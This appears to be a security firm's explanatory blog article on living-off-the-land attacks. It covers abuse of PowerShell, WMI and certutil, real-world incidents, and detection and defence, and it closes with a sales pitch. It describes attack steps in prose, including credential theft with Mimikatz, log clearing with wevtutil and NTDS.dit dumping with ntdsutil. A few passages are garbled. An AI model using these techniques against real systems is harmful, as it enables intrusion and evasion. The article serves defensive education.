Living Off the Land (LOTL) Attacks: How your tools are used against you?

Introduction

A well-known organisation called SolarWinds was attacked in September 2019. In this attack, a hacker used a supply chain attack to inject malicious code into the system. More than 18,000 SolarWinds customers installed Updates containing the dangerous code.

Living off the land attacks use legitimate tools to carry out malicious activities. They are particularly dangerous because they are hard to detect and easily bypass traditional security controls.

In this article, readers will gain a detailed understanding of the living off-the-land attack. They will also learn about its evolution and defensive cyber security measures.

Understanding Living Off the Land (LOTL) Attacks

What is a Living Off the Land Attack?

Living off the Land is an attack in which attackers use legitimate tools and components already present in the victim’s environment to perform their malicious activities.

The term “living off the land” comes from individuals’ survival method of using natural resources instead of relying on external supplies. In terms of cybersecurity, this represents how attackers perform malicious activities using legitimate tools and methods already present in target systems (Windows Management Instrumentation (WMI), PowerShell, Scheduled Tasks, etc.) while remaining undetected.

These attacks are becoming more effective and common than traditional malware attacks because they are challenging to detect with security tools. They enable attackers to develop privileges, steal data, and create a backdoor to access in the future.

LOTL Meaning and Terminology

The acronym “LOTL” stands for “Living Off the Land” attacks. In these attacks, attackers use legitimate administrative tools to penetrate the network and disguise their actions as genuine system processes. Now, the question is why attackers use this technique. There are many reasons, including:

• Many organisations have less effective security and network management practices, which make it challenging for network defenders to differentiate between authentic and malicious behavior and perform behavioral analytics, proactive hunting, and detection.
• Generally, there is a lack of regular indicators of compromise (IOCs) related to the activity, tracking, and categorising of malicious behavior by network defenders.
• LOTL attacks allow cyber threat actors to avoid applying and investing in custom tools.

Traditional malware attacks, such as viruses, malware, and ransomware, use signature files; however, LOTL attacks are fileless malware, which means an attacker can avoid installing any code or scripts within the target system. Instead, attackers can use existing tools in the environment like PowerShell, passw, saving tools, Mimikatz, or Windows Management Instrumentation (WMI) for a successful attack.

Historical Evolution of Living Off the Land Techniques

APT29/Cozy Bear campaigns use a backdoor named POSHSPY, which includes two tools: Windows Management Instrumentation (WMI) and PowerShell. During an incident response engagement in 2015, it was found that the POSHSPY backdoor was applied as PowerShell scripts. Later, attackers updated the deployment of the backdoor to use WMI for persistence and storage. Over the past two years, APT29 has used POSHSPY in several other environments.

LOTL or Living Off the Land attacks have evolved from adjustable and segmented to more advanced and integrated. Now, these attacks include phases such as initial access, privilege escalation, lateral movement, and persistence. The report of Verizon Data Breach Investigations 2024 states an increase of 180% in vulnerability exploitation because attackers use an automated vulnerability scanning process, which allows them to identify security gaps and smoothly run their operations.

In this type of attack, threat actors use scripting languages to run malicious code in memory. This code can go undetected through traditional antivirus software that scans files on disk, eventually making it very difficult for security teams to detect and reduce these attacks.

The LOTL technique is popular among cybercriminals because it is challenging for security systems to detect such attacks. Existing tools and processes of the system do not raise any suspicion or trace for standard security solutions. Thus, hackers can use these tools to remain in the victim’s environment undetected and run malicious code.

Traditional malware techniques require installing malicious software such as viruses or ransomware, whereas the Living Off the Land technique doesn’t require any external installation; it uses existing tools and processes, making it easier for sophisticated attackers to achieve their purposes.

How Living Off the Land Attacks Work

Core Attack Principles

In this attack, scripting languages are used to download and run malicious code without alerting antivirus detection systems. Attackers gain initial access to the system by exploiting network vulnerabilities or spear phishing. Another method attackers use is leveraging system administration tools to move laterally across the network, escalate privileges, explore the network and gain access to systems and data. This enables attackers to carry out their malicious activities continuously and undetected.

The key principles of this attack include:

• Fileless malware: This nature of LOTL attacks allows attackers to execute malicious payloads directly into memory without installing external software.
• Evade detection: LOTL attacks use existing system tools, which prevent attackers from triggering security alarms and being detected.
• Misuse of Administrative Tools: Hackers use legitimate system tools that make it difficult for security teams to recognise malicious activity.
• Persistence: LOTL attacks let attackers build backdoors into the system using tools like PowerShell and WMI to plan for future attacks and observation.

Living-Off-the-Land Binaries (LOLBins)

LOLBins (Living Off The Land Binaries) are legitimate system binaries that can be reutilised for malicious purposes. Attackers use these binaries to bypass security controls and run commands. Some examples of LOLBins include certutil, WMIC and PowerShell. All these LOLBins involve genuine administrative functions, which can be exploited to run malicious code.

These binaries are perfect attack vectors for carrying LOTL attacks because of their capabilities and built-in trust with operating systems. These tools are already present on most Windows systems, reducing the attacker’s efforts to perform this attack. Using these binaries, attackers can also execute malicious code and remain undetected.

Detailed Attack Techniques and Methodologies

Living Off The Land (LOTL) attacks use various techniques to manipulate built-in system tools and genuine software to run malicious activities without being detected. Understanding these common techniques and methodologies is essential to detecting and reducing LOTL attacks before they cause serious damage.

One key element of LOTL attacks is fileless malware. Using tools like PowerShell, attackers can inject code directly into memory without writing malicious files to disk, making it difficult for traditional antivirus solutions to detect or stop the threat.

Exploitation of PowerShell is one of the widely used techniques in these attacks. PowerShell is a vital Windows scripting language that enables administrators to execute automated system tasks. Attackers use PowerShell to install and execute malicious code, modify system configurations, and perform data exfiltration. If an organisation overlooks monitoring command-line activity, it can easily go undetected, as PowerShell is a legitimate tool.

Another commonly used tool in LOTL attacks is Windows Management Instrumentation (WMI). WMI’s function is to query and manage system components. However, attackers use it for remote code execution, persistence, and lateral movement. Attackers can execute malicious scripts using WMI without developing new processes, which makes it difficult for traditional security tools to detect suspicious activity.

Memory-only malware exists only in memory, which is why it remains undetected. The Duqu worm is an example of memory-only malware. Cybercriminals use the Duqu worm for exploration, lateral movement, and data exfiltration.

Process injection techniques allow attackers to perform malicious activities using processes that either have valuable information (e.g., lsass.exe) or blend with operating system activity. Attackers use this attack to gain high-privilege access to part of the operating system. This attack doesn’t require dropping any malicious code to disk and enables the injection of payloads into the memory.

Real-World LOTL Attack Examples

Notable LOTL Attack Case Studies

Real-world LOTL attack examples include the Petya and NotPetya attacks in 2017. This attack caused significant damage to organisations and businesses worldwide. In this incident, the attackers encrypted the victim’s files and demanded ransom in exchange for the decryption key.

In 2020, NetWalker (a ransomware group) used the LOLT technique to attack a California healthcare institute by encrypting the crucial files of victims and demanding a ransom. This incident disrupted the healthcare system’s medical services, causing them to redirect the patient to other hospitals and delaying critical treatments.

In September 2019, a well-known company named SolarWinds suffered an attack. In this incident, a hacker used a supply chain attack to insert malicious code into the system. Over 18,000 SolarWinds customers installed updates with that malicious code. As a result, hackers impersonated users and accounts to spy on other organisations.

Industry-Specific LOTL Attack Patterns

The LOTL attacks have some serious high-profile incidents, including those in financial institutions, healthcare, and government sectors.

During the Ukraine power grid attack in 2015, an attacker used tools like PsExec and WinRM to move laterally across the network, using stolen credentials to execute malicious code. This incident disrupted electricity for 230,000 residents.

In 2017, the NotPetya attack caused over $10 billion in damages and disruption in companies like Merck and Maersk. In this incident, attackers disguised themselves as ransomware and used Mimikatz to steal credentials and PsExec to execute remote commands.

 In 2023, the Volt Typhoon campaign, a Chinese state-sponsored group, used Windows built-in tools, remote administrative tools, and self-signed certificates to target U.S. critical infrastructure such as telecoms. In the same year, a Chinese APT group targeted Southeast Asian governments by using digitally signed but vulnerable binaries to install malicious payloads, which enabled hackers to persist without using external malware.

Scattered Spider, also known as UNC3944, is a hacking group that attacked MGM in September 2023 with SIM swapping and SIM phishing. It gained access to MGM’s internal systems using social engineering. According to the report, this hacking group bypassed multi-factor authentication technologies using one-time passwords and login credentials. This incident resulted in substantial financial losses and extensive disruptions.

Anatomy of a LOTL Attack: Step-by-Step Walkthrough

Initial Access—The first step in the Living Off the Land attack lifecycle includes gaining initial access through RDP exploitation, stolen credentials, phishing techniques, or remote access tools. This way, the attacker enters the system disguised as an employee.

Execution and Privilege Escalation—The hacker acts as authorised personnel, using legitimate tools like PowerShell and WMI without installing any external software. This way, they slowly gain higher access, stealing admin credentials using the Mimikatz tool.

Lateral Movement—In this step, the hacker uses PsExec and RDP to access sensitive servers without being detected by AV detection and firewalls.

Data Exfiltration—They can access critical files and systems using commands like certutil, stealing data without triggering system security alarms.

Persistence—To leave no trace of their malicious activity, hackers use wevtutil to clear logs and build a hidden backdoor for observations and future exploitation.

Why LOTL Attacks Are So Effective

Bypassing Traditional Security Controls

Security solutions like antivirus use signature-based detection to detect traditional malware, relying on externally introduced or injected malicious code. But LOTL attacks use trusted system tools and environments, so they do not get detected and bypass signature-based detection.

Most antivirus software uses signature-based detection methods to identify malicious activities. Therefore, it is difficult for antiviruses to detect LOTL attacks.

Allowlisting is impractical because many organisations allow a wide range of IPs—for example, all the IPs of a cloud provider. Attackers might lease the neighboring IPs to perform the attacks. Therefore, providing the exact IP range and keeping the allowlist short is recommended.

Hiding in Plain Sight

Some creatures make themselves invisible to their predators by blending into their surroundings. In the same way, LOTL attacks hide their presence by camouflaging the malicious activities with normal system activities. This makes it challenging to detect such attacks. Additionally, using such legitimate tools creates plausible deniability to quickly identify wrongdoings in our network. This is how such threats are hiding in plain sight because of the lack of external tooling utilised in the environment.

As mentioned earlier, this attack used system tools and binaries. It is really challenging to differentiate between malicious activities and administrative tasks.

Advantages for Advanced Threat Actors

As attackers use pre-approved administrative tools like WMI or PsExec, they don’t need to develop custom malware. They can quickly run any commands using the system tools.

Threat actors like this technique because it is less likely that they will be detected by firewalls and AV detection. They don’t have to install any external software, such as viruses or malware. They can pretend to be authorised employees and cover their traces of malicious activities.

Detecting Living Off the Land Attacks

Behavioral Analysis and Anomaly Detection

To detect such attacks, it is recommended that one focus on behavioral analysis rather than signatures. In this attack, an attacker uses legitimate system tools and binaries and hence remains undetected. One should focus on detecting any unusual system or user behavior to identify such attack attempts.

Monitoring any unusual commands executed by system tools, especially administrative tools, can also help you detect LOTL attacks.

Sometimes, an attacker might exploit any parent process by creating a malicious child process. Therefore, it is essential to check for any suspicious parent-child relationships.

Advanced Monitoring Strategies

There are various advanced monitoring strategies to detect LOTL attacks. One such strategy is PowerShell logging and script block logging. Detailed logging, including the commands run and the level of access, can help you identify any malicious activities carried out using PowerShell.

One should also monitor process creation; if any suspicious or unusual process is created, it might be a potential indicator of a LOTL attack.

It is advised to monitor network traffic and logs regularly. Network traffic from any unknown or unusual connection should be analysed, especially the domains or IPs related to using tools like Cobalt Strike Chisel or Qakbot.

SIEM and EDR Approaches

Modern tools use Machine Learning and Artificial Intelligence to detect LOTL attacks. These tools have advanced monitoring capabilities to detect deviations from usual behavior. They also use intelligence feeds to remain updated with the latest Indicators of Compromise (IOCs) and attack techniques.

Some of the famous and common SIEM platforms are as follows:

• Splunk is an SIEM platform with advanced analytics and correlation capabilities.
• IBM QRadar is also an SIEM platform with threat intelligence and automated response capabilities.
• LogRhythm – This SIEM tool detects such attacks using machine learning and behavioral analytics.

One can also monitor the security logs with Event ID 4688, which is related to command-line and process creation logs, and Event ID 4673, which is related to privilege use logs.

LOTL Defense Strategies

Preventive Measures

Allowlisting restricts the number of applications your system can use, helping mitigate LOTL risks. Instead of blocking some bad applications, allow listing allows your business team to use only the software they need.

PowerShell in full language mode enables attackers to access system files, run arbitrary code, and modify security settings. By switching PowerShell to constrained language mode, these powers can be significantly reduced, lowering the attack surface.

Attackers rely on scripting languages to run malicious code. Restricting scripting languages or enforcing strict control can reduce the risk of LOTL attacks.

Architectural Controls

Network segmentation helps organisations avoid attackers’ movement within the internal network. If the internal network is segmented, attackers won’t be able to move laterally inside it.

One effective defensive strategy includes privileged access management. A least-privilege access control policy helps to ensure that users only have access to the resources and data they need to perform their functions. This limits access to sensitive data and resources, eventually lowering the risk of LOTL attacks.

Another effective prevention strategy is implementing a zero-trust architecture. Before giving access to every access request, it is essential to verify it, as no entity is automatically trusted thoroughly.

Response and Remediation Strategies

Many sophisticated attackers stay undetected in the victim’s environment for months or years. In such cases, a comprehensive historical analysis is essential. Suppose the assessment shows that an attack has occurred or is still running. In that case, the organisation should restrain the damage, repair and recover the affected systems, and strengthen the network against future threats.

The Future of Living Off the Land Attacks

Emerging LOTL Techniques

These days, LOTL attacks are evolving, and new tools and binaries are being targeted.

In the early days, LOTL was used by Advanced Persistent Threat groups, like APT33 (Elfin Group) and APT 29 (Cozy Bear), to carry out attacks requiring persistence and stealth. But these days, attackers are using these techniques to perform various malicious activities, such as ransomware, financial crime, supply chain attacks, etc.

Attackers can perform LotL attacks on any platform, regardless of whether it is Windows, macOS, or Linux. For macOS operating systems, this attack is sometimes also called ” Living off the Land.” To get the full list of LooBins for macOS, visit https://www.loobins.io/binaries/.

In a cloud environment, an attacker abuses the misconfigured permissions and other configurations to escalate their privileges.

Defensive Evolution

LOTL attack types pose a unique challenge to the security community. The security world has had to rethink how it spots bad guys using good tools completely. It’s a bit like trying to spot a thief who’s borrowed your kitchen knife – tricky, right? Traditional security tools used to look for dodgy-looking software, but now they’re much brighter, watching how legitimate tools behave and raising eyebrows when something seems off. It’s been quite the shift for security teams who’ve finally accepted that attackers will use the tools already on the system.

Machine learning has changed the game for spotting these LOTL attacks. These clever systems learn what “normal” looks like when IT admins use system tools, then notice when something doesn’t quite fit the pattern. Many UK companies have started using behaviour analytics that can tell the difference between Bob doing his job in IT and a hacker using the same Windows tools for something nasty. It’s not perfect, but it’s getting better all the time.

The threat-hunting crowd has also developed a unique knack for detecting these attacks. Rather than waiting for alerts, they’re actively poking around, looking at which processes spawned which others, and digging into computer memory to find malware that never even touched the hard drive. The cutting-edge stuff includes new tech that can protect the system tools themselves from being misused and clever ways to limit admin privileges until needed. It’s a cat-and-mouse game, but the defenders are catching up.

Predictions and Trends

Where are LOTL attacks heading? Attackers aren’t just going to give up – they’re getting craftier, starting to use obscure system utilities that most security teams haven’t even thought to monitor. It’s becoming a real headache for companies with different systems, as attackers develop tricks that work simultaneously across Windows, Mac and Linux. We’re also seeing them space out their activities over more extended periods – doing a bit here, waiting a while, then doing a bit there – making it harder to connect the dots.

During our internal pen test or red teaming jobs, the LOTL attack vector is one of the most effective techniques. Some quick examples include dumping NTDS.dit contents using ntdsutil and running enumeration techniques using AD tools installed on the servers. These attacks go unnoticed because they use legitimate tooling present within the environment. This can only be detected with extensive logging and monitoring at user accounts, network, and AD-level layers.

As defences improve, the bad guys keep adapting. They’re getting good at tailoring their evasion techniques to specific tools and leveraging trusted cloud platforms that security teams are reluctant to block. Some particularly worrying incidents have involved dodgy versions of legitimate admin tools being slipped into the supply chain. Imagine downloading what you think is a trusted tool, but it’s been tampered with before it even reaches you—nasty business that’s devilishly hard to spot.

AI is shaking things up on both sides of this battle. Security teams are using it to spot unusual patterns in how system tools are being used. In contrast, attackers might soon use AI to automatically pick the best LOTL techniques for each target. The innovative organisations aren’t waiting around – they’re already working on the assumption that their trusted tools will be weaponised at some point. They’re limiting who can use what, keeping a close eye on everything, and ensuring their security teams know what suspicious activity looks like. It has a bit of a grim outlook, but at least people are taking it seriously now.

Conclusion

Living off-the-land attacks are one of the most complex and challenging threats in cybersecurity. They are hard to detect by methods like sandboxing, allow listing, signature-based methods, and pattern recognition techniques. This is due to their stealthy nature, using system binaries and tools like PowerShell, WMI, or CertUtil. Still, organisations can minimise the risk by using behavioral monitoring, Network segmentation, and other methods. Customising the strategies to meet or balance your operational and regulatory requirements is important.

Your organisation might be considering an active directory security assessment and thorough infrastructure pen testing services on an annual or post-change basis. If not, it’s worth asking us for a competitive quote to help you make an informed decision.

How long ago was your internal pen test done? Did you do it thoroughly and not just a point-and-click scanning exercise? If you need advice, get in touch to discuss your strategy.

Frequently Asked Questions

What is a living off the land attack?

Living off the land is a complicated cyber attack in which the attacker targets legitimate tools and system applications to perform malicious activities.

What is a living-off-the-land binary (LOLBin)?

Living-off-the-land-binary (LOLBin) is a non-malicious binary operating system that performs regular tasks. Some common examples of LOLBin are certutil and Windows Management Instrumentation Command Line (WMIC).

How do living-off-the-land attacks differ from traditional malware?

Unlike traditional malware attacks, living-off-the-land attacks exploit system-native tools and binaries to bypass traditional security measures like antiviruses.

What are the most common tools used in LOTL attacks?

The most common tools used in LOTL attacks are PowerShell and WMI.

How can I detect living off the land techniques in my environment?

There are various ways to detect living off the land techniques, including enabling detailed event logging, recording day-to-day activities, and creating a baseline of installed tools and software.

Are LOTL attacks only targeting Windows systems?

No, LOTL attacks can be performed on any operating system like Windows, macOS or Linux.